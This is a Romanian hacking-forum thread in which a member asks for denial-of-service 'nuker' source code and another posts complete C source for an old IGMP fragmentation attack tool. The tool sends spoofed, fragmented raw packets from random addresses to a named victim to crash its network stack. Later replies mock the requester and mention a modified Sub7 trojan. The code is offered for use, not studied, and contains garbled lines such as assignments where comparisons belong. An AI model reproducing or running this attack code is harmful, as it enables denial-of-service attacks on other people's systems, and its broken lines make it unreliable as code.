Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale . In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
Lista Forumurilor Pe Tematici
Bine ati venit pe HackTeam Forum ! | Reguli | Inregistrare | Login

POZE BINE ATI VENIT PE HACKTEAM FORUM !

Nu sunteti logat.
Nou pe simpatie:
ciocolata4u la Simpatie.ro
Femeie
19 ani
Bucuresti
cauta Barbat
30 - 51 ani
Bine ati venit pe HackTeam Forum ! / Help / Probleme / sursa nuker  
Autor
Mesaj Pagini: 1
Juggernaut
Membru

Din: Bucuresti
Inregistrat: acum 18 ani
Postari: 116
sal all as vrea si eu o sursa de ddoser ; nuker ; flooder de ip cum vreti sa` ii ziceti ... ceva mai avansat .. pt visual basic .. vreau sa mai invat cateceva :P ms anticipat

_______________________________________
..:: LiteHack ::..
Intra pe http://www.playandwin.ro/?ref=5160 link si castiga tricoul echipei favorite, o pereche de de role plus alte premii....  B)  B)  B)

pus acum 18 ani
   
[ViP]SoftKill
Membru

Inregistrat: acum 18 ani
Postari: 168
Aveam yo ceva ... nu mai stiu sigur de unde lam luat ... poate iti foloseste la ceva .

Code:

#include <stdio.h>
            #include <unistd.h>
            #include <stdlib.h>
            #include <netdb.h>
            #include <string.h>
            #include <errno.h>
            #include <pwd.h>
            #include <time.h>
            #include <sys/types.h>
            #include <sys/socket.h>
            #include <sys/utsname.h>
            #include <netinet/in.h>
            #include <netinet/ip.h>
            #include <netinet/ip_icmp.h>
            #include <netinet/igmp.h>



            void usage(char *arg)
            {
            printf("Kox by Coolio ( )n");
            printf("Usage: %s <victim>n", arg);
            exit(1);
            }


            unsigned int randip()
            {
            struct hostent *he;
            struct sockaddr_in sin;
            char *buf = (char *)calloc(1, sizeof(char) * 16);

            sprintf(buf, "%d.%d.%d.%d",
            (random()%191)+23,
            (random()%253)+1,
            (random()%253)+1,
            (random()%253)+1); 

            inet_aton(buf, (struct in_addr *)&sin);
            return sin.sin_addr.s_addr;
            }

            unsigned short in_cksum(unsigned short *buh, int len)
            {
            register long sum = 0;
            unsigned short oddbyte;
            register unsigned short answer;

            while(len > 1) {
            sum += *buh++;
            len -= 2;
            }

            if(len = 1) {
            oddbyte = 0;
            *((unsigned char *)&oddbyte) = *(unsigned char *)buh;
            sum += oddbyte;
            }

            sum = (sum >> 16) + (sum & 0xFFFF);
            sum += (sum >> 16);
            answer = ~sum;
            return answer;
            }

            int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof)
            {
            int BIGIGMP = 1500;
            unsigned char *pkt;
            struct iphdr *ip;
            struct igmphdr *igmp;
            struct utsname *un;
            struct passwd *p;

            int i, s;
            int id = (random() % 40000) + 500;

            pkt = (unsigned char *)calloc(1, BIGIGMP);
            ip = (struct iphdr *)pkt;
            igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));

            ip->version = 4;
            ip->ihl = (sizeof *ip) / 4;
            ip->ttl = 255;
            ip->tot_len = htons(BIGIGMP);
            ip->protocol = IPPROTO_IGMP;
            ip->id = htons(id);
            ip->frag_off = htons(IP_MF);
            ip->saddr = spoof;
            ip->daddr = victim->sin_addr.s_addr;
            ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));

            igmp->type = 0;
            igmp->group = 0;
            igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));

            for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
            i < BIGIGMP; i++)
            pkt[i] = random() % 255;
            #ifndef I_GROK
            un = (struct utsname *)(pkt + sizeof(struct iphdr) +
            sizeof(struct igmphdr) + 40);
            uname(un);
            p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
            memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
            #endif
            if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
            perror("error: socket()");
            return 1;
            }

            if(sendto(s, pkt, BIGIGMP, 0, victim,
            sizeof(struct sockaddr_in)) = -1) { 
            perror("error: sendto()");
            return 1;
            }
            usleep(1000000);

            for(i = 1; i < 5; i++) {
            if(i > 3)
            ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
            else
            ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
            sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
            usleep(2000000);
            }

            free(pkt);
            close(s);
            return 0;
            }

            int main(int argc, char *argv[])
            {
            struct sockaddr_in victim;
            struct hostent *he;
            int i;

            srandom(time(NULL));

            if(argc < 2)
            usage(argv[0]);

            if((he = gethostbyname(argv[1])) = NULL) {
            herror(argv[1]);
            exit(1);
            }
            memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
            victim.sin_port = htons(0);
            victim.sin_family = PF_INET;

            printf("IGMP> ");
            fflush(stdout);
            for(i = 0; i < 10; i++)
            {
            nuke_igmp(&victim, randip());
            printf(".");
            fflush(stdout);
            }
            printf("n");
            fflush(stdout);
            }

            *
            ** pimp.c 6/4/99 by Rob Mosher:  
            ** exploits bug in m$'s ip stack
            ** rewrite by  
            ** bug found by klepto
            ** usage: pimp <host>
            */



_______________________________________



pus acum 18 ani
   
Juggernaut
Membru

Din: Bucuresti
Inregistrat: acum 18 ani
Postari: 116
man eu am specificat ca vreau pt vb6 (visual basic 6) dak nu ai de vb6 asta e ms ca oricum mi l`ai dat pasta .. poate o sa ma reapuc de c++ :P

_______________________________________
..:: LiteHack ::..
Intra pe http://www.playandwin.ro/?ref=5160 link si castiga tricoul echipei favorite, o pereche de de role plus alte premii....  B)  B)  B)

pus acum 18 ani
   
Sad-Dreamer
Vizitator



se pare ca eshti chiar cel mai prost de aici..! GOOGLE !

pus acum 18 ani
   
DJAx3L
Membru

Inregistrat: acum 19 ani
Postari: 145
scuze nu m`am putut abtine .. lol sad )

_______________________________________



pus acum 18 ani
   
Sad-Dreamer
Vizitator



pey mi-a zis pe mess ca si-a codat propriul troian :-)) si mi-a dat serverul si clientul.....si era sub7 modificat..clienctul nedetectabil..dar serverul da...si tot o tinea pe a lui ca e programator...si acum cere surse de portfuck si ddosere :-I ..daca era programator isi facea singur...sau cauta naibii pe google LAME KID

pus acum 18 ani
   
Pagini: 1  

Mergi la